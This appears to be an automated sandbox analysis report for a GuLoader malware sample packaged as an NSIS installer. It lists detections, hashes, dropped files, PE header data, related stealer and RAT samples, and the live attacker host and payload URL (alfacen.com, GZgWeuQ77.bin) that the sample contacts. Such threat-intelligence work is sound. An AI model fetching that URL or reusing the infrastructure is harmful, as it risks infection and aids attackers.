Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Antivirus detection, initial sample
Source | Detection | Scanner | Label
450707124374000811.exe | 45% | ReversingLabs | Win32.Trojan.Guloader
450707124374000811.exe | 100% | Avira | HEUR/AGEN.1337946

Antivirus detection, dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll | 0% | ReversingLabs | (none)

Antivirus detection, unpacked PE files: No Antivirus matches
Antivirus detection, domains: No Antivirus matches

Antivirus detection, URLs
Source | Detection | Scanner | Label
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
alfacen.com | 193.107.36.30 | true | false | (none) | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://alfacen.com/GZgWeuQ77.bin | false | (none) | unknown

URLs from memory and binary strings (the alfacen.com entries ending in "binf", "bine" and "bine/Q" come from the same heap region as each other and are most likely the contacted .bin URL carved together with trailing bytes, not distinct paths)
Name | Source | Malicious | Reputation
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 450707124374000811.exe, 00000004.00000001.2467393777.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | unknown
http://www.ftp.ftp://ftp.gopher. | 450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | unknown
https://alfacen.com/GZgWeuQ77.binf | 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 450707124374000811.exe, 00000004.00000001.2467393777.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | false | unknown
https://alfacen.com/GZgWeuQ77.bine | 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://nsis.sf.net/NSIS_ErrorError | 450707124374000811.exe | false | URL Reputation: safe
https://alfacen.com/ | 450707124374000811.exe, 00000004.00000003.2863513431.0000000005653000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863552565.000000000565B000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893461136.000000000565C000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863258714.000000000565B000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://alfacen.com/GZgWeuQ77.bine/Q | 450707124374000811.exe, 00000004.00000003.2863513431.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000003.2863275238.0000000005638000.00000004.00000020.00020000.00000000.sdmp, 450707124374000811.exe, 00000004.00000002.2893414813.0000000005639000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 450707124374000811.exe, 00000004.00000001.2467393777.0000000000649000.00000020.00000001.01000000.00000006.sdmp | false | unknown
Contacted public IPs
IP | Domain | Country | ASN | ASN Name | Malicious
193.107.36.30 | alfacen.com | Bulgaria | 201200 | SUPERHOSTING_ASBG | false
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1538185
                        Start date and time:2024-10-20 19:07:08 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 43s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:450707124374000811.exe
                        Detection:MAL
                        Classification:mal80.troj.evad.winEXE@2/8@1/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 47
                        • Number of non-executed functions: 195
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: 450707124374000811.exe
Time | Type | Description
13:09:59 | API Interceptor | 3x Sleep call for process: 450707124374000811.exe modified
Other samples seen with IP 193.107.36.30
Associated Sample Name / URL | Detection | Threat Name
3507071243740008011.exe | malicious | GuLoader
3507071243740008011.exe | malicious | GuLoader
Potwierdzenie.exe | malicious | GuLoader
Potwierdzenie.exe | malicious | GuLoader
SKM_C16024100408500.vbs | malicious | GuLoader
SKM_C25024100408500.vbs | malicious | GuLoader

Other samples seen with domain alfacen.com
Associated Sample Name / URL | Detection | Threat Name | Context (IP)
3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
SKM_C16024100408500.vbs | malicious | GuLoader | 193.107.36.30
SKM_C25024100408500.vbs | malicious | GuLoader | 193.107.36.30

Other samples seen with ASN SUPERHOSTING_ASBG
Associated Sample Name / URL | Detection | Threat Name | Context (IP)
3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
Potwierdzenie.exe | malicious | GuLoader | 193.107.36.30
SKM_C16024100408500.vbs | malicious | GuLoader | 193.107.36.30
SKM_C25024100408500.vbs | malicious | GuLoader | 193.107.36.30
Atlanta Office Interiors #024-010.pdf | malicious | Unknown | 185.45.66.155
https://ipexcel-my.sharepoint.com/:u:/p/bhaskar/EXkHa_fTPjZKq-NlTqXIh7sBrIzBSy8pqbKPLGCEzX2rbA | malicious | Unknown | 185.45.66.155
Arcadia Aerospace Industries LLC (Code qJG7x-ZymK9p-KYuh).html | malicious | Unknown | 193.107.36.200
is homemade pepper spray legal uk 42639.js | malicious | GookitLoader | 185.45.67.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | 3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
  | Unlock_Tool_2.3.1.exe | malicious | Vidar | 193.107.36.30
  | 3507071243740008011.exe | malicious | GuLoader | 193.107.36.30
  | aZm1EZ2IYr.exe | malicious | Vidar | 193.107.36.30
  | Unlock_Tool_2.4.exe | malicious | Vidar | 193.107.36.30
  | JuyR4wj8av.exe | malicious | Stealc, Vidar | 193.107.36.30
  | SecuriteInfo.com.FileRepMalware.4445.21502.exe | malicious | Unknown | 193.107.36.30
  | yAkRyU2LPe.exe | malicious | Vidar | 193.107.36.30
  | EL7ggW7AdA.exe | malicious | Stealc, Vidar | 193.107.36.30
  | y45bCpZY1I.exe | malicious | Vidar | 193.107.36.30
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll | 3507071243740008011.exe | malicious | GuLoader
  | 3507071243740008011.exe | malicious | GuLoader
  | Potwierdzenie.exe | malicious | GuLoader
  | Potwierdzenie.exe | malicious | GuLoader
  | RICHIESTA_OFFERTA_RDO2400423.docx.doc | malicious | GuLoader
  | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | malicious | Remcos, GuLoader
  | Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe | malicious | GuLoader
  | Nutzen_Unterschrift_Planen#2024.com.exe | malicious | Remcos, GuLoader
  | Nutzen_Unterschrift_Planen#2024.com.exe | malicious | GuLoader
  | Benefit_Signature_Plan#3762.com.exe | malicious | Remcos, GuLoader
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):5.659026618805001
                                                        Encrypted:false
                                                        SSDEEP:192:eX24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlqSlS:D8QIl972eXqlWBFSt273YOlqz
                                                        MD5:9625D5B1754BC4FF29281D415D27A0FD
                                                        SHA1:80E85AFC5CCCD4C0A3775EDBB90595A1A59F5CE0
                                                        SHA-256:C2F405D7402F815D0C3FADD9A50F0BBBB1BAB9AA38FE347823478A2587299448
                                                        SHA-512:DCE52B640897C2E8DBFD0A1472D5377FA91FB9CF1AEFF62604D014BCCBE5B56AF1378F173132ABEB0EDD18C225B9F8F5E3D3E72434AED946661E036C779F165B
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
• Filename: 3507071243740008011.exe, Detection: malicious
• Filename: 3507071243740008011.exe, Detection: malicious
• Filename: Potwierdzenie.exe, Detection: malicious
• Filename: Potwierdzenie.exe, Detection: malicious
• Filename: RICHIESTA_OFFERTA_RDO2400423.docx.doc, Detection: malicious
• Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious
• Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, Detection: malicious
• Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious
• Filename: Nutzen_Unterschrift_Planen#2024.com.exe, Detection: malicious
• Filename: Benefit_Signature_Plan#3762.com.exe, Detection: malicious
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...Y..Y...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):283894
                                                        Entropy (8bit):7.702006100164842
                                                        Encrypted:false
                                                        SSDEEP:6144:vhdVvrRbGmvDU6wCxZkgdpQWENGHJCLJqjFaX6ql6ytdwD:vtvrRbGmvrwcZkg8zcHJCLkmt2D
                                                        MD5:D60DE2837DB415CC4F66B85247B99A5B
                                                        SHA1:7C46A763764028D65B812909021A647305772AB0
                                                        SHA-256:3105B5A8590A4AEE190FFAAF4C84D09B123F08DD1B6F34677BBF1BB69AECC716
                                                        SHA-512:36C9CA47DC9E55AC81CB242E7848C91913B3737579F52A39570CF1247770517BAF003812F01999A2B45CC9193FAA85910EBE9B0D1C3E960AC3E1A24D84366101
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.........F.o.%%%...--....................PPPP............./.;;;;;........ppp.....QQ.....55......MMMMM....................k..............SS.00...............................dddd...777..y......V..............p....N..OO.......GGG.....u...G.*........z.L......UUUU..OO........::.--............777....O....................0.++++.H...............".%......................$..........///...k..5...NN....[[.((.4...V...L................**........v...............jj......o............1........................I........../...................[[[[[[........((.4..............\......................YY.%..qq........V......................A.....................666..................//..........................1.........t.w.H......zzz..4444.a..k........#####.ff...........M..............|..........................&&&&.&................cccc....^^..1111..'.YY....zzzz........((.I........GG....................!!!!..mmmmm..C...................................................a....88..........UU....7............@@......
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):82981
                                                        Entropy (8bit):4.614849518351854
                                                        Encrypted:false
                                                        SSDEEP:1536:HD0Zl31ONi8ZXxYo6qRyCkWuE78I23R0HEpJQ3Tv:HD0ObxxhcCkxg4QDv
                                                        MD5:12629C74AA6BCA8746FD8DB17EE09A8F
                                                        SHA1:A0EECC9D844403FE34CB19B19AB2CE32202B77F3
                                                        SHA-256:209451B54F4D28E90AE8D1B6A073C1234236CCEE38870399027001F5E9E38908
                                                        SHA-512:930C34FA9C781A8D4EFBB7DAAC625C1AFBB0BECDEC93DF745D0C8F17CB2FEFCA034539668A361AF4F0AA482271C3BD746B18C8BFEC17EFCD2666C8C5187722A7
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:....{{..J.....P..::...................:...CC.1.....OO....}}.++.........III..n...h..........8.-......................,....MMMM.;.:::......}}....<....................SSSS....7..........##....5......^^^.....3....bb................VV........N.}}}...........J........22.v.................kk.....(((((((((((.............e.YYY..............o.....................B.llll...........#....Q.9.000.......]]]......F..........AAAA.g.YY........NNN..........WWW..................%%...............TTT...........A.......i.Y.zzzz....$...........%............t...........x.........a....k........mmmm..u...c....................`.....................gg............'''.......m.ii.........LL.NN.A.............o..........#.. ...###..........!...h..}............^..>......HHHHH...LLL...........}}............................jj...?........%%%%.............c...uu...............>...+....,,...R...d.......???..............f......DD.....................9.........$........O................. .....S......zz.........qq........x..XXX.
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 999x605, components 3
                                                        Category:dropped
                                                        Size (bytes):167813
                                                        Entropy (8bit):7.749904770387752
                                                        Encrypted:false
                                                        SSDEEP:3072:icF5a5FZl5xa0SYazQR5dRfp3oVadIALnwP5kipQlMXG6g9:5r2x1SYkQR53fpoVABLnwRk0QKXRg9
                                                        MD5:8C0739994C90303B65A05C6909A53B62
                                                        SHA1:E43239AF385F8DED6EA2098D2A71A2AC9519E32B
                                                        SHA-256:7E1835782673A877C8A4FF9A4E9E88A23D8FA54077B6E7E1D70FBDE5F3A9D66B
                                                        SHA-512:65BB94BEE91A5581EC7BEFE758F2AD71235ED07DEDDC5B85F5E5719B62E2ADCEFDFB080C9DC5D5C67BC2DBA846C26B62E8E043DCF33F02F65B9B18FC4942277F
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......JFIF.....H.H....9Rhttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46.272976, Sat Jan 27 2007 22:37:37 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Make>Canon</tiff:Make>. <tiff:Model>Canon DIGITAL IXUS 800 IS</tiff:Model>. <tiff:Orientation>1</tiff:Orientation>. <tiff:XResolution>72/1</tiff:XResolution>. <tiff:YResolution>72/1</tiff:YResolution>. <tiff:ResolutionUnit>2</tiff:ResolutionUnit>. <tiff:YCbCrPositioning>1</tiff:YCbCrPositioning>. <tiff:Compression>6</tiff:Compression>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:xap="http://ns.adobe.com/xap/1.0/">. <xap:ModifyDate>2008-12-25T21:16:15Z</xap:ModifyDate>. <xap:CreatorTool>Adobe
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):329924
                                                        Entropy (8bit):4.933260234424776
                                                        Encrypted:false
                                                        SSDEEP:6144:sXxDu/qV1rYX0GEETHfS1YHoQccZ6eJ7Myv5CTV:shy/qSu6qJcZFJPBi
                                                        MD5:562A26D4A57C23D2AE8BD4DECE37E771
                                                        SHA1:A9830E759E670EB8D4EFC5320A112E44ECB389BA
                                                        SHA-256:EDF2898EFF5E72AA11993272EB941C1CD992BB6243E4D2F5940BD88EDF9117CD
                                                        SHA-512:50E8291CB30F1916A5FC41EC7A64C9690A5ABD2AA5B56277029AB04EBCA19769DA91C214C4098B7FC5A8E7E048EBACFC9CFD41540F613B65C1BFF92AEAC49496
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......s.......|Xkt........"..y....8W..........6.......g...k.X......G,..........Q...+...M......2....Vr......3....n...q^D.......J.-........l.........&....~.......E,..(d...e.....S......a........J...#............w..).......y.?....b.........\.............u...............y.6....].j..........y......4.......T...x......O7....E.....)...|.J.9..)...5c...^..'.......YA............#t...e.....}.....B......"............K..0...{......Z..,........\....X...D.y........j(...........l......*......0.........j.E6.......................t...................Bm-............N...`..................A..../{...(...hN...............k...X...Y.m...P......^....O?..........C.e........B..b............y..M...P...... y............|....}.8..H..........y................r.oS!.'..G...l.7.*.....q..tO..g.....,..........~.................?..............V.B.........B......n/..j...............e...........0.mo.b......Ix.....=..Q.!..G............Q\4n..........O.br.7....d.nvH.t.....`...b......A.+...1............j....w......T.
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):48084
                                                        Entropy (8bit):4.914629993393861
                                                        Encrypted:false
                                                        SSDEEP:768:D/rnROkWNBnJ+9RlvYC45nQikaSOn/i7/nY1kakXzsDwft2EwNWBbTvMIQwBT:zrx8BnJ+lyzknku2kakXYDwcEcWbwoBT
                                                        MD5:511E6E568EBCF13D5098054630C627AA
                                                        SHA1:1B5AFC7023C138219737E23B00121C359BF8443F
                                                        SHA-256:204A44F0D3C3B63E36B3A4865C029552CCD8AC1EAD3507456BEC7886D724BA54
                                                        SHA-512:DC3088BA850BA2258715826CF985D417A6A138A9EF66F43EBC69EB18CEDA9F4B65686C3F70E2BA39E64AEB8B55B82F550EE603094F06B988DC122299183075E8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.................3v......0...........8......n..m....i............d ...... ..........'..MDY...... ...|............-.....|....dt...........G...bC..J............~....?..@........?.k..................z..!........k........................i.......|f.....X.(.......N..X..v....>..e..................J.....T..........3."...p9...r....2........................<..".......qj...i.`.;........a..........v...k.......%.f......os.....,....(.*.....|...#...y.7....,...............c.......i.9H............L..sx...{....=.....N'..\...|.B.....U...&.........B1J<................A....1.....A}\.7.Q........7................K..............C%......8...G....a.................................T.Y.kB.........P............o...&.`....{...{..A.........f....`.........q..............d.............W.......1-...>..R.)s;".e......0..B...].....E........R..............`.......{'...........0...m........._t.........x..............#.p....@_3..j.o............................C......=`...........Nx....Q\......:....A....5...e......~..
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):501
                                                        Entropy (8bit):4.284126845947256
                                                        Encrypted:false
                                                        SSDEEP:12:7Dvz9cWhFxJiWtT/ksqSYLbLGLW+/tbV90QhtdtmCq/oK6:vpJrilbgW+hHfmCq/ol
                                                        MD5:5D2F45598C5DAD8A461CECDA82CA550E
                                                        SHA1:D594FFDAE11463E5E35170D27C611182F16E038C
                                                        SHA-256:65D3114548018688712A3B735E3B9BA63C2261A5DA9B6505D43378DE5E351B87
                                                        SHA-512:BF9654722B7F313B0E5C9A755C0DA9D37930FA517CA43F36C97F6033C7C764ACACDAC8FDE143A9D89D33D9ED7CC4EE08A96A0DEB14D484E4ACB43E830CA15470
                                                        Malicious:false
                                                        Preview:wellcurbs realkreditlaan rhamnoses aluminiumfoliens needlecase gld.bromelin scoters mormoder klinges albigensianism sociolektens curpel shuttles awreck laboratorieopgave eksercerskoler..nonfederated sprinklingers multiplepoinding indfaldsvinkelen korttegnere opinionsmaalingernes exobiology.amazingly palikars accessibility matriarchical erstatningskravene dorns..reclaimant prepubescent unfairest lusiad uhmmedes proctodaeum sydslesvigers.stormwise septaemia rangsforskel flytteligt hardboard dentex,
                                                        Process:C:\Users\user\Desktop\450707124374000811.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):54488
                                                        Entropy (8bit):4.944297757860882
                                                        Encrypted:false
                                                        SSDEEP:1536:BYkiahV7T7eAwz8ruqJUjhEXVM54+suwGXs:BFiahJTCAi8dQ6M54rWs
                                                        MD5:4ECFFF116FE03C56DAD5B0EAE0279D00
                                                        SHA1:18525703697F059B03F7A1F093317E62BAD43004
                                                        SHA-256:593BF06B816C8CACBA83C6CCECD0C3F0F164C4D9CC7F9B4EA7BF2EA2F0CD7906
                                                        SHA-512:D6EBCD15BEE3AD32BB91D7EFEAB363B917127ACF62A8838E621FFA0F080060E00E06BDACD9F2BDD4BE37DFC1A9449A4CE678BC1821E005BAEC3263272BF8877A
                                                        Malicious:false
                                                        Preview:.... ........a....D..o.X...........&.=...x.....l...w......h.2....D ..............6...V^.~...u.......v...(.......8Q..7.................6....A6.....;..5.T.P......K...I...]...........Bk.....4......4.....'...z....k./.....r......f..8.5....S......T..0......."...x...S........@......(......z.;...H...3'd.d.....{.c..Z...3........|...........].i...2....8.{....0............8.............6...<.@C..r..$3...N=...+..].s...6.........N........y........I..........W....&.........T....}............bd.g................,.......I#..J/...C-.....e...}!..........J..B.P...............{..................8i....$................1.1......[.............>....`4y....A.kA......U........[...dmE..5.......)...e...).....l....T.l......................................`.[....l.N..=...........$....g.... ....Z.<v...?....>...L.o..........D.......&'.*.........2..............k......... 2E... ....KT..2.,.......`.c...........d.E.......<p......!0...I.U....9.._.....a..o5>...............+.....]...P...D....C@..N.........w.hx..
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.7511646883690775
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:450707124374000811.exe
                                                        File size:1'001'467 bytes
                                                        MD5:22aeab62009aaa9073b3159d7da1195e
                                                        SHA1:602dd47b6910a522be90fc47d10d5c26a836a01a
                                                        SHA256:1fc195e3937e7c7d9ca78f9c39f8997d5ed98fe1c608ad5c7b4a01dc24ddd967
                                                        SHA512:057f99c072baf1b2c4aadbf5851ac90288af03d991a2b2732d2d9e3c6856a62cbb3c44416e6fb6f67e193a6e50c79d0afb8f5d61f5d9a39e903f9179850b8286
                                                        SSDEEP:24576:8HANkRMLHpVBNAVC+qTC0otgAhHYGDL4kJiMv:8HANkRMLHf3OC+qTfPGD0aJ
                                                        TLSH:DD251205E3A06467C3F5CBF807A6925B7A3BDC79E641074B0352B76A2A78741F14E3AC
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...~..Y.................f.........
                                                        Icon Hash:c4bcaaec6ceeda31
                                                        Entrypoint:0x403373
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x597FCC7E [Tue Aug 1 00:34:06 2017 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                        Instruction
                                                        sub esp, 000002D4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        pop edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+14h], ebx
                                                        mov dword ptr [esp+10h], 0040A2E0h
                                                        mov dword ptr [esp+1Ch], ebx
                                                        call dword ptr [004080A8h]
                                                        call dword ptr [004080A4h]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [00434EECh], eax
                                                        je 00007F8701347433h
                                                        push ebx
                                                        call 00007F870134A6C9h
                                                        cmp eax, ebx
                                                        je 00007F8701347429h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082B0h
                                                        push esi
                                                        call 00007F870134A643h
                                                        push esi
                                                        call dword ptr [00408150h]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], 00000000h
                                                        jne 00007F870134740Ch
                                                        push 0000000Ah
                                                        call 00007F870134A69Ch
                                                        push 00000008h
                                                        call 00007F870134A695h
                                                        push 00000006h
                                                        mov dword ptr [00434EE4h], eax
                                                        call 00007F870134A689h
                                                        cmp eax, ebx
                                                        je 00007F8701347431h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F8701347429h
                                                        or byte ptr [00434EEFh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408044h]
                                                        push ebx
                                                        call dword ptr [004082A0h]
                                                        mov dword ptr [00434FB8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+34h]
                                                        push 000002B4h
                                                        push eax
                                                        push ebx
                                                        push 0042B208h
                                                        call dword ptr [00408188h]
                                                        push 0040A2C8h
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8608 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6a000 | 0x34908 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x65ef | 0x6600 | a7ac317f30d043d93d4c5978f973de39 | False | 0.6750919117647058 | data | 6.514810500836391 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x149a | 0x1600 | 966a3835fd2d9407261ae78460c26dcc | False | 0.43803267045454547 | data | 5.007075185851696 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2aff8 | 0x600 | d113e76cc1b8c0774c4702688d79d792 | False | 0.5162760416666666 | data | 4.036693470004838 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x35000 | 0x35000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6a000 | 0x34908 | 0x34a00 | d09097303c9883a16609d6cfc168ddcd | False | 0.5725671763657957 | data | 6.134346545573802 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x6a400 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x6a768 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.39200579675854724
RT_ICON | 0x7af90 | 0xc890 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9980328762854472
RT_ICON | 0x87820 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.46636535631700654
RT_ICON | 0x90cc8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.49302218114602586
RT_ICON | 0x96150 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.4863013698630137
